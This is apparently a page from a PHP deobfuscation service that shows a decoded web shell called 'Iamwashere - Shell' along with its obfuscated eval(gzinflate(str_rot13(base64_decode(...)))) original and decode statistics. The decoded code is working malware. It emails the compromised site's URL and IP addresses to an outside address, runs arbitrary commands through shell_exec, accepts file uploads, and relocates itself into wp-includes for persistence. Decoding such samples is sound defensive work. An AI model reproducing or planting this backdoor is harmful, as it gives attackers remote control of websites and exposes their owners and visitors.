Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
$rhs = 'rUlbQuNTFH4u0v6HbhrtOE1j2EmVSYARlDglRVZ1HPoCyJrYEzKLYvKMCSniv/ecGTuX5UW22lVEnGa+Zv..
Decoded Output download
@ini_restore("disable_functions");
if (!isset($_SESSION['bajak'])) {
$visitcount = 0;
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$body = "ada yang inject
$web$inj";
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE = OFF";}
else {$security= "SAFE_MODE = ON";};
$df='ini_get disable!';
$serper=gethostbyname($_SERVER['SERVER_ADDR']);
$injektor = gethostbyname($_SERVER['REMOTE_ADDR']);
mail("[email protected]", "$body","Hasil Bajakan http://$web$inj
$security
IP Server = $serper
IP Injector= $injektor");
$_SESSION['bajak'] = 0;
}
else {$_SESSION['bajak']++;};
if(isset($_GET['clone'])){
$source = $_SERVER['SCRIPT_FILENAME'];
$desti =$_SERVER['DOCUMENT_ROOT']."/wp-includes/petx.php";
rename($source, $desti);
}
$safem0de = @ini_get('safe_mode');
if (!$safem0de) {$security= "SAFE_MODE : OFF";}
else {$security= "SAFE_MODE : ON";}
echo "<title>Iamwashere - Shell</title><br><br>";
echo "<font size=2 color=#888888><b>".$security."</b><br>";
$cur_user="(".get_current_user().")";
echo "<font size=2 color=#888888><b>User : uid=".getmyuid().$cur_user." gid=".getmygid().$cur_user."</b><br>";
echo "<font size=2 color=#888888><b>Uname : ".php_uname()."</b><br>";
echo "<font size=2 color=#888888><b>Disable Functions : ";$df='ini_get disable!';
if((@function_exists('ini_get')) && (''==($df=@ini_get('disable_functions')))){echo "NONE";}else{echo "$df";}
function pwd() {
$cwd = getcwd();
if($u=strrpos($cwd,'/')){
if($u!=strlen($cwd)-1){
return $cwd.'/';}
else{return $cwd;};
}
elseif($u=strrpos($cwd,'\')){
if($u!=strlen($cwd)-1){
return $cwd.'\';}
else{return $cwd;};
};
}
echo '<form method="POST" action=""><font size=2 color=#888888><b>Command</b><br><input type="text" name="cmd"><input type="Submit" name="command" value="cok"></form>';
echo '<form enctype="multipart/form-data" action method=POST><font size=2 color=#888888><b>Upload File</b></font><br><input type=hidden name="submit"><input type=file name="userfile" size=28><br><font size=2 color=#888888><b>New name: </b></font><input type=text size=15 name="newname" class=ta><input type=submit class="bt" value="Upload"></form>';
if(isset($_POST['submit'])){
$uploaddir = pwd();
if(!$name=$_POST['newname']){$name = $_FILES['userfile']['name'];};
move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name);
if(move_uploaded_file($_FILES['userfile']['tmp_name'], $uploaddir.$name)){
echo "Upload Failed";
} else { echo "Upload Success to ".$uploaddir.$name." :D "; }
}
if(isset($_POST['command'])){
$cmd = $_POST['cmd'];
echo "<pre><font size=3 color=#000000>".shell_exec($cmd)."</font></pre>";
}
else { echo "<pre><font size=3 color=#000000>".shell_exec('ls -la')."</font></pre>";
}Did this file decode correctly?
Original Code
$rhs = 'rUlbQuNTFH4u0v6HbhrtOE1j2EmVSYARlDglRVZ1HPoCyJrYEzKLYvKMCSniv/ecGTuX5UW22lVEnGa+Zv/mjI9yJsNFKJ2XwqGxR3ySiGNNcpGWbKZ1++DDlpwSdFsqJbTTCgM/CPrDwRWb8K/8jt202z89fth33VglaJRKmSYe2QOj1lxZ4BENU3/7oyttNh5fhHTDYFliQy2zrxvqkf/XpR+Mw8tE3wImbLwABOUxJwue3RKwEJEm1xm6U3uKMMWnIt2LBUCPsZZbyJKhMFnzS7By/lhgmzy2lIiqReoFuA9BbX5rPuz64GDY69GDpw9bIkTiDdQAQBg6nm2sDlZV3bp6c5ISciFXDxSzXOnJIuOpY5a1Mvsbnme7I3Vg3Q1kBzMA968Zjfzz4dhfM1e5WRxNiFmmkypGM5Ekx7coZ6M8pTuEmhbSHW3GlVnI7zgvnpGZ1sV+p9M0EdrZ1Gyd9S9VIMp7gWzUUlx0BKR90/u8BGSTqqHGZj7U419o8Rni0yfTPjloGkH94Y+vS5TkmUA+IZ1HXpWRSycIC0FU/Ytk2Ov/6Q9Bzn1zVRIDZiXxSaju8PTy3B+Mw9FjOHM3Lu3Mi12ZUlYF0EEh9INbzApxQSl5g3qoHW99tXruP5BJ+++i1b6lFYCiTEHooZY6EVR9ns45WbYUcZcEOOHDjtUcQVfzxVd3k3YOh0LJf4T3C4nyBIb18xfzAeARaJdkXW3YmSyNWyAMK5i1VB3qT5khCKA32gidtljb741kCQZDVSVwz2tXF/AIHpYhXFdhSsrbYpXrdr0rHg4QAkUcdkuZZLa/31rXnlzSeJYeujxr/WcDZJ3jc1CG4k4qrZwGytp68vEjZBjzPAd9rNjzebkCFthhRhwMBz7MHylFWMDYEKKBk28O/SJrOqJseRdShCKbRavylC7LIkoO6mpLh5mjcUfbqFhRc0ft3c+oKIWuyoygxAVjUNDHNbk5p7X8pRDX198TA9CvB6kDbuUMxkimJMU9CHG5wCuDY9MDj9Kjt4dsmqcpz+KGA4cyKypa9KIQHtXiTkaCNPF1lMZnRhtHk0eu9NYPJfc8qcz/O8BqMLMjabCZqYABGRd2lXVM8EUb3GHMNWIyYsrBd/6jhMsiyWxZbTIRpowOop9IM5NkLLI6W3Jm3wBZwb5J4/HCv7SO+cVtezOLgZgb632ynsSaf+ymtf78Wx0nE2Z8oCRXuEWe5hsGNslNVCdt2Vtb8FN71y4H7NgVs8bN9UMZi0viPUiszsBpy+TR2NTpgNGjRJjrBO+P4Io1LW43gDMgw8M0vxeh9S7iEAHOiyY6LU94BhfHMhvXhKmT+SGusE27DhpJwP0ub1x6QsTeJ3FQH0dEJJQiGlHut+5g/+5qbreRJ2banjW5Jn3TcjgjpnK1Mo3NnVuv1KIU6wz6tW7QnvnAfXBeVWA9ishOQnMxWxJo0JauvySQ/+GUJYrsJpy96Phf';
eval(gzinflate(str_rot13(base64_decode($rhs)))); Function Calls
| gzinflate | 1 |
| str_rot13 | 1 |
| base64_decode | 1 |
Stats
| MD5 | 45fb674b8a458f861cb227b1f6b866a0 |
| Eval Count | 1 |
| Decode Time | 85 ms |